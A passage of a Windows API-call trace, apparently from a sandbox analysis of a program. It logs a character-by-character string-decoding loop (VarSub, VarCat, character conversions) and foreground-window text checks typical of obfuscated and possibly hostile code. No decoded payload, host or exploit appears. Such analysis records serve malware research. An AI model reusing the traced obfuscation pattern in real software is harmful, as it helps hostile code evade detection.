lpUsedDefaultChar=0x0) returned 1 [0182.243] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.243] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.243] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0182.244] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.244] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.245] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.245] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.246] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.246] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0182.247] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.247] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.247] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.248] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.248] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.249] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0182.249] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.250] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.250] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.251] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.251] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.252] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.252] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.252] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.253] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.253] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.253] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.254] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.254] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.254] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.255] GetForegroundWindow () returned 0x20086 [0182.255] GetLastError () returned 0x0 [0182.255] SysStringLen (param_1=" ") returned 0xff [0182.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.255] SysStringLen (param_1=" ") returned 0xff [0182.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.255] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0182.256] GetLastError () returned 0x0 [0182.256] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.256] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0182.256] SysStringLen (param_1="Prog") returned 0x4 [0182.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x11684fc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0182.257] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0182.257] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0182.257] GetFocus () returned 0x0 [0182.257] lstrlenA (lpString="Prog") returned 4 [0182.257] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0182.257] GetWindowTextA (in: hWnd=0x103c4, lpString=0x10ebcd0, nMaxCount=5 | out: lpString="Prog") returned 4 [0182.258] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0182.258] GetFocus () returned 0x0 [0182.258] lstrcmpA (lpString1="Prog", lpString2="Prog") returned 0 [0182.258] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.258] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0182.258] GetFocus () returned 0x0 [0182.258] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0182.259] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0182.259] GetFocus () returned 0x0 [0182.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0182.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0182.259] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.259] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0182.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.261] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0182.261] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.261] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0182.262] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.262] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0182.262] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.263] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.264] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.264] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.264] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.265] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0182.265] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.266] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.266] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.267] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0182.267] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.268] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.268] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.269] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.269] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.270] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0182.270] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.318] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.318] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.319] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.319] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.320] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0182.320] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.320] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.321] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.321] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.322] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.322] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0182.323] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.323] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.323] MultiByteToWideChar 